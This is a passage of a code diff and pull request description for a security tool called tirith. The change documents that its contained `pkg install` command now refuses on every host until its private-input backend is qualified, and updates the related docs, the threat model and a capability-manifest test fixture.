+on every host. The private named-input backend has not been qualified to keep
+package inputs unchanged throughout execution against another process owned by
+the same user.
+Read-only mounts and initial digest checks alone do not establish that guarantee.
+The command refuses before resolver execution, network access, quarantine writes,
+checkpoint creation, or package execution. `--yes`, `--allow-degraded`, sudo, and
+administrator access do not enable it. The hidden private-input launcher also
+refuses before creating a namespace or starting its target.
+
+This restriction applies to contained package execution. `tirith package inspect`
+and `tirith pkg verify-env` remain available; the latter verifies an existing
+environment without launching pip. `tirith pkg approve` remains subject to its
+separate approval-authority and platform requirements and never installs; an
+approval cannot bypass this execution refusal. Ordinary capsules and command
+protection retain their existing platform and coverage requirements.
 
 ### The untrusted-project preset
 

--- a/docs/commands.md
+++ b/docs/commands.md
@@ -102,7 +102,7 @@ covers the everyday subset; this is the complete reference.
 | Command | What it does |
 |---------|-------------|
 | `tirith pkg approve <backend> <spec>` | Resolve and inspect a requirement set and approve its install plan, printing the plan digest the approval binds to. Does not install |
-| `tirith pkg install <backend> <spec>` | Resolve, inspect, and install only the verified hash-pinned bytes inside the containment capsule, with a tamper-evident receipt. Enforcing execution is x86_64 Linux-only; every other platform fails closed before pip starts |
+| `tirith pkg install <backend> <spec>` | Currently disabled on every host pending private-input qualification. Refuses with `private_input_execution_unqualified` before resolver, quarantine, checkpoint, or package execution; flags and elevation do not enable it |
 | `tirith pkg verify-env` | Verify an already-installed environment's RECORD integrity without installing anything |
 | `tirith pkg trust-tool` | Enroll a fully static native Linux `uv` executable by canonical path and SHA-256 |
 | `tirith pkg graph` | Compose a provenance graph (ownership / execution / payload) over a wheel set or an installed environment. Read model only |

--- a/docs/compatibility.md
+++ b/docs/compatibility.md
@@ -43,7 +43,8 @@ what an experimental command must satisfy to move to stable.
 | `threat-db` | Experimental | Threat-DB `update` / `status` / `explain` / `sources` / `health` / `diff`. |
 | `package risk` / `package explain` / `package scan` | Experimental | Advisory package-name, local-content, installed-tree, and optional registry-provenance analysis. Does not enforce an install. |
 | `package inspect` | Experimental | Local-only verdict over wheel artifacts, artifact sets, or installed Python environments. No implicit download. |
-| `pkg approve` / `pkg install` | Experimental | Enforcing pip approval/install path on x86_64 Linux only. Unsupported systems refuse before pip starts; npm and Cargo are not enforcing backends. |
+| `pkg approve` | Experimental | Non-installing pip approval flow subject to its native authority and platform requirements. An approval cannot enable the disabled package-install backend. |
+| `pkg install` | Experimental | Disabled on every host: `private_input_execution_unqualified` refuses before resolver, quarantine, checkpoint, or package execution. Flags and elevation cannot enable it. Local inspection, `pkg verify-env`, ordinary command checks, and shell protection remain available. |
 | `pkg verify-env` | Experimental | Read-only RECORD verification of an installed Python environment. |
 | `pkg graph` / `pkg diff` / `pkg attest` / `pkg receipt` | Experimental | Provenance, differential, attestation-binding, and receipt evidence. Graph and attestation are not auto-allow decisions. |
 | `mcp lock` / `mcp verify` / `mcp diff` | Experimental | Source-qualified MCP config and descriptor drift. `verify` is the gating command; `diff` is informational. |

--- a/docs/task-envelope.md
+++ b/docs/task-envelope.md
@@ -245,8 +245,16 @@ envelope (`capsule_preset_run`, `remote_script_run`, `gateway_forward`,
 `package_manager_network`, and `package_manager_execution`) and is a no-op at
 the four that submit package or config-write envelopes (`package_approval`,
 `package_resolve`, `package_install_preparation`, `config_write`).
-`tirith pkg approve`, `pkg install`, and tirith-owned config writes keep working
-unchanged.
+These assessment results do not qualify the package execution backend.
+`tirith pkg install` currently refuses on every host with
+`private_input_execution_unqualified`, before resolver, quarantine, checkpoint,
+or package execution. The refusal applies regardless of `task_gate.mode`,
+`action_incomplete_analysis`, existing approvals, confirmation flags, or elevation.
+
+`tirith pkg approve` and tirith-owned config writes retain their existing
+native authority and policy requirements. Local `tirith package inspect`,
+`pkg verify-env`, ordinary `tirith check`, and shell protection remain available
+under their existing policies.
 
 `warn` remains the conservative default, and
 `effects_denied_for_untrusted_sources` is the blunter control. But `block` is a

--- a/docs/threat-model.md
+++ b/docs/threat-model.md
@@ -42,9 +42,10 @@
   detection layer, not a containment boundary. There is one narrow, opt-in
   exception (see "Opt-in runtime containment" below): the Linux-only live
   every live `tirith run` (`--capsule` remains a legacy spelling),
-  `tirith temp-run --capsule`, `tirith gateway run --capsule`, and (future) `tirith
-  pkg install` surfaces route the program they launch through an OS containment
-  capsule. This is an explicit, per-invocation choice for tirith-launched
+  `tirith temp-run --capsule` and `tirith gateway run --capsule` surfaces route
+  the program they launch through an OS containment capsule. Contained
+  `tirith pkg install` execution is currently disabled pending private-input
+  qualification. This is an explicit, per-invocation choice for tirith-launched
   processes, not blanket containment of the shell.
 - **Network monitoring**: tirith does not inspect network traffic after command execution
 - **Malware detection**: tirith analyzes command structure, not payload content (except via `run`)
@@ -162,7 +163,11 @@ tirith-launched surfaces can route their child process through:
   of the temp-dir file isolation.
 - `tirith gateway run --capsule` spawns the upstream MCP server contained
   (deny-network).
-- `tirith pkg install` (a later milestone) installs only inside the capsule.
+- `tirith pkg install` currently refuses on every host before resolver,
+  quarantine, checkpoint, or package execution. Its private named-input backend
+  has not been qualified for immutable inputs throughout the complete target
+  lifetime against another process owned by the same user. Generic capsule
+  coverage does not establish that additional guarantee.
 - `tirith capsule run --preset untrusted-project` copies an untrusted project
   into a held ephemeral directory and runs an exact argv there. It is
   enforceable on x86_64 Linux with a usable Landlock ABI and refuses on every
@@ -174,8 +179,7 @@ The capsule is **honest about what it enforces**. Every backend reports a
 per-capability coverage ledger and never claims a control it did not apply. The
 loopback egress broker is a broker, NOT the boundary: domain-egress is only
 claimed where the OS backend blocks raw outbound sockets except to the broker.
-Enforcing surfaces (`pkg install`, the contained gateway, and Linux
-live `tirith run`)
+Enabled enforcing surfaces (the contained gateway and Linux live `tirith run`)
 **fail closed** when the host backend cannot deliver the required containment;
 `temp-run --capsule` is a best-effort hardening that runs uncontained, and says
 so, when no backend is available. `tirith doctor` reports the real per-platform

--- a/tests/fixtures/c00/contracts.toml
+++ b/tests/fixtures/c00/contracts.toml
@@ -28,6 +28,17 @@ projection_bytes_sha256 = "3c6db0581ec9a6beab368502810e8faa273916e55f19a20eb21f1
 security_projection_hash = "3c6db0581ec9a6beab368502810e8faa273916e55f19a20eb21f1d60731b46fb"
 
 [capability_manifest]
+# Private-input execution qualification compatibility note: `pkg install` now
+# refuses before resolver, quarantine, checkpoint, or package execution on every
+# host. Its inspection level changes from full to none, and its coverage states
+# the disabled execution scope. This is an explicit defensive capability
+# restriction pending qualification of immutable named inputs for the complete
+# target lifetime; generic capsule coverage is insufficient to establish it.
+# All 88 commands, their order and groups, manifest_version 1, and every
+# policy_complete value are unchanged. Only pkg install's inspected and coverage
+# fields differ; every other parsed command field is unchanged. The public
+# refusal retains exit 1 and the existing JSON fields, with refused_before_exec
+# naming the earlier failure phase. Flags and elevation cannot bypass it.
 # Release-documentation truthfulness note: the existing `mcp-server` coverage
 # now distinguishes the six cross-platform tools from the additional
 # `tirith_fetch_cloaking` tool available on Unix. No command, group, inspection
@@ -99,7 +110,7 @@ security_projection_hash = "3c6db0581ec9a6beab368502810e8faa273916e55f19a20eb21f
 # tirith does not download, inspect, or bind the tarball bytes npm installs. No
 # command was added, removed, renamed, or regrouped, and no `inspected` or
 # `policy_complete` value changed; that was a documentation-truth edit only.
-sha256 = "03270b4ec0ce3d38ad081d810a1bedca5b2904f32da05dc3cef9ee1ee8a0929f"
+sha256 = "c6bf1e24d5f455d2de0f1965b875bcff467f19f0d92cb27334fe0fcef10b5a58"
 
 [mcp]
 default_tools = [


### PR DESCRIPTION
Contained package installation needs immutable private inputs throughout the target's complete lifetime. That guarantee has not been qualified for the current private-input backend, so `pkg install pip` now returns `private_input_execution_unqualified` before policy discovery, resolver/network activity, quarantine, checkpoint creation or package execution.

A shared guard also covers internal contained-install entry points, bound-input capsule launch, hidden private-input operands and Linux namespace entry. Flags, environment variables and elevation do not bypass the refusal. Ordinary capsule commands and static artifact inspection keep their existing requirements. Public malformed request validation and documented exit/JSON contracts are preserved.

Help, current capability documentation and the frozen capability digest reflect the disabled execution path. Tests cover both public formats, opt-in flags, hidden-launch refusal without markers/state publication, ordinary capsule parsing, inspection availability and the updated help text.

Validation: independent static review of the five guard boundaries, Rustfmt, diff checks, capability identity/order and frozen digest checks passed. The equivalent guard in the cycle candidate passed its selected CLI unit and integration checks; that evidence is not a runtime certification of this focused branch. This exact branch still requires CI, including native Linux paths. Version remains 0.4.2; no release is published.
